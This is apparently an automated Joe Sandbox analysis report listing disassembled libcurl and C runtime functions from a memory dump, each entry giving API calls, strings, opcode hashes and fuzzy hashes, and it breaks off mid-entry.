                                                                                                                                  • No valid port number in connect to host string (%s), xrefs: 6B8E452E
                                                                                                                                  • Please URL encode %% as %%25, see RFC 6874., xrefs: 6B8E447B
                                                                                                                                  • %25, xrefs: 6B8E446A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ___from_strstr_to_strchr
                                                                                                                                  • String ID: %25$Invalid IPv6 address format$No valid port number in connect to host string (%s)$Please URL encode %% as %%25, see RFC 6874.
                                                                                                                                  • API String ID: 601868998-2404041592
                                                                                                                                  • Opcode ID: 292a7a6ec1b204848c9c76ede7462d948fae4c6d7ee76bb4501a1735dcf798a0
                                                                                                                                  • Instruction ID: d2cd9f64c424bb14a5e5d6f58aef076b64c55e6e54a85b74b9a77aa19a1aff0e
                                                                                                                                  • Opcode Fuzzy Hash: 292a7a6ec1b204848c9c76ede7462d948fae4c6d7ee76bb4501a1735dcf798a0
                                                                                                                                  • Instruction Fuzzy Hash: 095137B5A492546AEB114E38AC117AE3BA59F8331CF0C09F5ECAC87241E73DC55386B2
                                                                                                                                  Function 6B8E4590 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 161COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • curl_maprintf.LIBCURL(%s%s%s,6B93D4D4,?,6B93D4D0,?,00000000,00000000,?,?,6B8E308E,?,00000000,?), ref: 6B8E4603
                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8E4663
                                                                                                                                    • Part of subcall function 6B9006B0: curl_mvsnprintf.LIBCURL(?,00000801,00000000,6B8F6C24), ref: 6B9006EF
                                                                                                                                    • Part of subcall function 6B9006B0: curl_msnprintf.LIBCURL(?,00000004,...,?,?,?,00000E20), ref: 6B90072F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ___from_strstr_to_strchrcurl_maprintfcurl_msnprintfcurl_mvsnprintf
                                                                                                                                  • String ID: %s%s%s$Connecting to hostname: %s$Connecting to port: %d
                                                                                                                                  • API String ID: 3946109057-1840313707
                                                                                                                                  • Opcode ID: 9bca81e3b1aaa5adbb65d0a9a54ea2ecd45501c223a8f6cb78d6b29f6c09ae06
                                                                                                                                  • Instruction ID: 6aec00bb2c67524ee0d73a3d156eeaa0c00da4bf28e6766e7c261caae7325d4c
                                                                                                                                  • Opcode Fuzzy Hash: 9bca81e3b1aaa5adbb65d0a9a54ea2ecd45501c223a8f6cb78d6b29f6c09ae06
                                                                                                                                  • Instruction Fuzzy Hash: 3351D675D05618AFDB018F68C84069E7BB8EF87314F0845A5EC6CAB342D7789A018BF1
                                                                                                                                  Function 6B8EDFD0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 102COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • curl_strnequal.LIBCURL(NTLM,6B8EB6E6,00000004,00000DD0,?,?,?,6B8EB6E6,?,?,?,?,?,?,00000000,?), ref: 6B8EE00B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_strnequal
                                                                                                                                  • String ID: NTLM$NTLM auth restarted$NTLM handshake failure (internal error)$NTLM handshake rejected
                                                                                                                                  • API String ID: 482932555-2258391893
                                                                                                                                  • Opcode ID: 2c9a02d89f49a812ca40a75f805383508c25966e4a3de9ff475dd1bdea028030
                                                                                                                                  • Instruction ID: 972ef69bceb89d7b186979da053386976bb5f94421d155df2dc1a8b90e634bc6
                                                                                                                                  • Opcode Fuzzy Hash: 2c9a02d89f49a812ca40a75f805383508c25966e4a3de9ff475dd1bdea028030
                                                                                                                                  • Instruction Fuzzy Hash: B7214676A102152BEB005E78FC41B9A7BA9EF8236DF104862EC58C7102E73AE525C7B0
                                                                                                                                  Function 6B92C4C3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6B92C475,?,?,6B92C43D,?,00000000,?), ref: 6B92C4D8
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6B92C4EB
                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,6B92C475,?,?,6B92C43D,?,00000000,?), ref: 6B92C50E
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                  • Opcode ID: a9f05af97df452de3075437b4a7383406e32c79c80a7fe582bcc9ecdcee8538f
                                                                                                                                  • Instruction ID: bfeb4f5150cd86e171adb5982f753a504bc1793e41dfa6fa9910532b79ad38bd
                                                                                                                                  • Opcode Fuzzy Hash: a9f05af97df452de3075437b4a7383406e32c79c80a7fe582bcc9ecdcee8538f
                                                                                                                                  • Instruction Fuzzy Hash: EEF01C31919518FBDF11AB91CA09F9E7F78EB46759F1041A4A811A2151DB78CF01DBA0
                                                                                                                                  Function 6B935E4D Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _free.LIBCMT ref: 6B935E65
                                                                                                                                    • Part of subcall function 6B92F7EA: RtlFreeHeap.NTDLL(00000000,00000000,?,6B935EE0,6B9538A0,00000000,6B9538A0,00000000,?,6B935F07,6B9538A0,00000007,6B9538A0,?,6B93532A,6B9538A0), ref: 6B92F800
                                                                                                                                    • Part of subcall function 6B92F7EA: GetLastError.KERNEL32(6B9538A0,?,6B935EE0,6B9538A0,00000000,6B9538A0,00000000,?,6B935F07,6B9538A0,00000007,6B9538A0,?,6B93532A,6B9538A0,6B9538A0), ref: 6B92F812
                                                                                                                                  • _free.LIBCMT ref: 6B935E77
                                                                                                                                  • _free.LIBCMT ref: 6B935E89
                                                                                                                                  • _free.LIBCMT ref: 6B935E9B
                                                                                                                                  • _free.LIBCMT ref: 6B935EAD
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                  • Opcode ID: 1cac679f4033d945714b89cf5a2628f07fc0f52683818181ae2701e1a1ad92eb
                                                                                                                                  • Instruction ID: 3d4bf3d1a78bb7e3bf992c9917b4fae5daf22418eda8b30497bbf809d35ba1d0
                                                                                                                                  • Opcode Fuzzy Hash: 1cac679f4033d945714b89cf5a2628f07fc0f52683818181ae2701e1a1ad92eb
                                                                                                                                  • Instruction Fuzzy Hash: D7F06D72D18614BBCA24DE78F1D2D1F3BEDBB1A6183600C5AF159D7500CB38F8808AA4
                                                                                                                                  Function 6B8D5C60 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 335COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6B8D6970: inet_pton.WS2_32(00000002,?,?), ref: 6B8D699A
                                                                                                                                    • Part of subcall function 6B8D6970: inet_pton.WS2_32(00000017,?,?), ref: 6B8D69AB
                                                                                                                                  • inet_pton.WS2_32(00000002,?,?), ref: 6B8D5CC3
                                                                                                                                  • inet_pton.WS2_32(00000017,?,?), ref: 6B8D5CD2
                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8D5D8E
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: inet_pton$___from_strstr_to_strchr
                                                                                                                                  • String ID: /
                                                                                                                                  • API String ID: 1475684856-2043925204
                                                                                                                                  • Opcode ID: 3d5302548053694662536978fe5a0bc3e41919eb6b8140ee09fffe3de28ff7fa
                                                                                                                                  • Instruction ID: 0863425ba2cf7afc210b51e88719daf7dea5650f7bd741d7ede3c10b487223fb
                                                                                                                                  • Opcode Fuzzy Hash: 3d5302548053694662536978fe5a0bc3e41919eb6b8140ee09fffe3de28ff7fa
                                                                                                                                  • Instruction Fuzzy Hash: 5CC1B0B1A047469BDB118F78C944BEAB7F4EF06204F0409ABED55DB201EB39E514CBB1
                                                                                                                                  Function 6B8DCD00 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 166networkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,6B8DD060,?,?,6B8DBEF5), ref: 6B8DCE4D
                                                                                                                                  Strings
                                                                                                                                  • FTP response aborted due to select/poll error: %d, xrefs: 6B8DCE54
                                                                                                                                  • We got a 421 - timeout!, xrefs: 6B8DCE70
                                                                                                                                  • FTP response timeout, xrefs: 6B8DCE98
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast
                                                                                                                                  • String ID: FTP response aborted due to select/poll error: %d$FTP response timeout$We got a 421 - timeout!
                                                                                                                                  • API String ID: 1452528299-2064316097
                                                                                                                                  • Opcode ID: 2c14cbdc706554e3ceef309fb548a2796dbb130b96b6167bfcaf8bf8e44ab6bc
                                                                                                                                  • Instruction ID: cbef2ec5ae57f160c529e264f82f5844e3385526e6ba6da2e80b14bcb0988321
                                                                                                                                  • Opcode Fuzzy Hash: 2c14cbdc706554e3ceef309fb548a2796dbb130b96b6167bfcaf8bf8e44ab6bc
                                                                                                                                  • Instruction Fuzzy Hash: 8C51A676E002099FDB108F69DC4079EBBB5FF45329F100ABAE818D7292E7399951CB91
                                                                                                                                  Function 6B91D900 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: CURL_SSL_BACKEND
                                                                                                                                  • API String ID: 0-3552431867
                                                                                                                                  • Opcode ID: 3e4bab1be43fdc254543e45adc9b90c080cf8da3418dce3a8b34b35533b08e8d
                                                                                                                                  • Instruction ID: ae2f0453f7cbddaa71c81f049b31ca91746ced70315f8ab06d52058e09c5e83a
                                                                                                                                  • Opcode Fuzzy Hash: 3e4bab1be43fdc254543e45adc9b90c080cf8da3418dce3a8b34b35533b08e8d
                                                                                                                                  • Instruction Fuzzy Hash: A131B87768D30DABDF04CF64E841A1677ACAF41759F4444B9E809CB312E739D842D791
                                                                                                                                  Function 6B8DCB00 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 101networkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • getsockname.WS2_32(BB830100,?,?), ref: 6B8DCB43
                                                                                                                                  • accept.WS2_32(?,?,00000080), ref: 6B8DCB6B
                                                                                                                                    • Part of subcall function 6B9006B0: curl_mvsnprintf.LIBCURL(?,00000801,00000000,6B8F6C24), ref: 6B9006EF
                                                                                                                                    • Part of subcall function 6B9006B0: curl_msnprintf.LIBCURL(?,00000004,...,?,?,?,00000E20), ref: 6B90072F
                                                                                                                                    • Part of subcall function 6B8FA660: ioctlsocket.WS2_32(00000000,8004667E,6B8D4554), ref: 6B8FA67A
                                                                                                                                  Strings
                                                                                                                                  • Connection accepted from server, xrefs: 6B8DCBAB
                                                                                                                                  • Error accept()ing server connect, xrefs: 6B8DCB87
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: acceptcurl_msnprintfcurl_mvsnprintfgetsocknameioctlsocket
                                                                                                                                  • String ID: Connection accepted from server$Error accept()ing server connect
                                                                                                                                  • API String ID: 1634289926-2331703088
                                                                                                                                  • Opcode ID: 5dc891ef44e3982339c3be20ab4294e51bb84fe210e499b38246e5144089bacb
                                                                                                                                  • Instruction ID: 7e9ab2e2c16fe3a73ecb2cbf8d8b47f9b6c5e344eff64f43e2e8d8439606b070
                                                                                                                                  • Opcode Fuzzy Hash: 5dc891ef44e3982339c3be20ab4294e51bb84fe210e499b38246e5144089bacb
                                                                                                                                  • Instruction Fuzzy Hash: E131FC75A00118ABDB10DF38DC81BEEB778EF45318F0046A6FD5DA7281EF3999548BA0
                                                                                                                                  Function 6B9006B0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • curl_mvsnprintf.LIBCURL(?,00000801,00000000,6B8F6C24), ref: 6B9006EF
                                                                                                                                  • curl_msnprintf.LIBCURL(?,00000004,...,?,?,?,00000E20), ref: 6B90072F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_msnprintfcurl_mvsnprintf
                                                                                                                                  • String ID: ...$...
                                                                                                                                  • API String ID: 4251218765-2253869979
                                                                                                                                  • Opcode ID: 63a942a8eba840c97ed57ecfc0dd70d463dd1137c30c492116e72586c01bc0b8
                                                                                                                                  • Instruction ID: 1ae47645b2fac7bf7fe28a5483718422c03cbc467b2bec2899520efb41daebfc
                                                                                                                                  • Opcode Fuzzy Hash: 63a942a8eba840c97ed57ecfc0dd70d463dd1137c30c492116e72586c01bc0b8
                                                                                                                                  • Instruction Fuzzy Hash: F311B479E0420CAADF05CE24DC41BF977A9EB42308F0485DDD89497251DA7AE64A8BD1
                                                                                                                                  Function 6B91DA40 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • curl_getenv.LIBCURL(CURL_SSL_BACKEND,?,?,?,6B91CB27,00000000,6B8E692E), ref: 6B91DA73
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_getenv
                                                                                                                                  • String ID: CURL_SSL_BACKEND
                                                                                                                                  • API String ID: 2452071183-3552431867
                                                                                                                                  • Opcode ID: 41b0fe33c2cbb6dacb99dfe08acd4cba1d4a6e4e4eee996ada4ebeda0dff6255
                                                                                                                                  • Instruction ID: a82c91a71caac58b5e7ae3f7057532c2c6d14af2a7bb8b2c565ee32f78be51ba
                                                                                                                                  • Opcode Fuzzy Hash: 41b0fe33c2cbb6dacb99dfe08acd4cba1d4a6e4e4eee996ada4ebeda0dff6255
                                                                                                                                  • Instruction Fuzzy Hash: A101C43B68D20DABDB08DBA4A941B1677A8AF82759F440479D809C7320E739D483D792
                                                                                                                                  Function 6B8D90C0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 30libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6B90ACC0: GetModuleHandleA.KERNEL32(kernel32,?,00000002,6B90AEAE), ref: 6B90ACCE
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,InitSecurityInterfaceA), ref: 6B8D90FD
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                  • String ID: InitSecurityInterfaceA$secur32.dll$security.dll
                                                                                                                                  • API String ID: 1646373207-3788156360
                                                                                                                                  • Opcode ID: 86255286bcadd49cf6413b56065073658582dad4eff22b4ebda3599852140932
                                                                                                                                  • Instruction ID: 10e41d6acbf9c7d825412fab77d5e32c65c1274586ba66a1df97808d847f1d38
                                                                                                                                  • Opcode Fuzzy Hash: 86255286bcadd49cf6413b56065073658582dad4eff22b4ebda3599852140932
                                                                                                                                  • Instruction Fuzzy Hash: 97F065B17447067AEE141B354C1B71632655751748F84C8F9A900E7283FF3CC9009B50
                                                                                                                                  Function 6B92A96C Relevance: 6.1, APIs: 4, Instructions: 132COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 6a2c2af0b6c5a708a55941b935f228f38959015c6650e3d1b1322581b302a906
                                                                                                                                  • Instruction ID: 59c009c04e9add3514af58072c1ad88d0f2a7078d1945e3f8ed7ff4761df4039
                                                                                                                                  • Opcode Fuzzy Hash: 6a2c2af0b6c5a708a55941b935f228f38959015c6650e3d1b1322581b302a906
                                                                                                                                  • Instruction Fuzzy Hash: 274126B6E50754BFE3149F38CC02B9ABBB9EF89714F11856AE111DB385D379D9408B80
                                                                                                                                  Function 6B934DB7 Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _free.LIBCMT ref: 6B934E87
                                                                                                                                  • _free.LIBCMT ref: 6B934EB0
                                                                                                                                  • SetEndOfFile.KERNEL32(00000000,6B92D700,00000000,?,?,?,?,?,?,?,?,6B92D700,?,00000000), ref: 6B934EE2
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,6B92D700,?,00000000,?,?,?,?,00000000,?), ref: 6B934EFE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFileLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1547350101-0
                                                                                                                                  • Opcode ID: cbd37b667953460e913cacf95aa202754b0450238898f11fc2d422506243a676
                                                                                                                                  • Instruction ID: 8f92095d3ae5e977ced30f3aef1c29c1d6acae26ac9f1232cf3b680ce2e72d52
                                                                                                                                  • Opcode Fuzzy Hash: cbd37b667953460e913cacf95aa202754b0450238898f11fc2d422506243a676
                                                                                                                                  • Instruction Fuzzy Hash: FC41E732D00625ABDB219FB5CC41B8E3BB9EF59328F260150F524A73A0E73EC9104B61
                                                                                                                                  Function 6B92F53B Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,6B9237F2,?,00000000,00000000,?,6B9284AA,6B928987,00000000,?,00000000), ref: 6B92F540
                                                                                                                                  • _free.LIBCMT ref: 6B92F59D
                                                                                                                                  • _free.LIBCMT ref: 6B92F5D3
                                                                                                                                  • SetLastError.KERNEL32(00000000,00000015,000000FF,?,6B9284AA,6B928987,00000000,?,00000000), ref: 6B92F5DE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
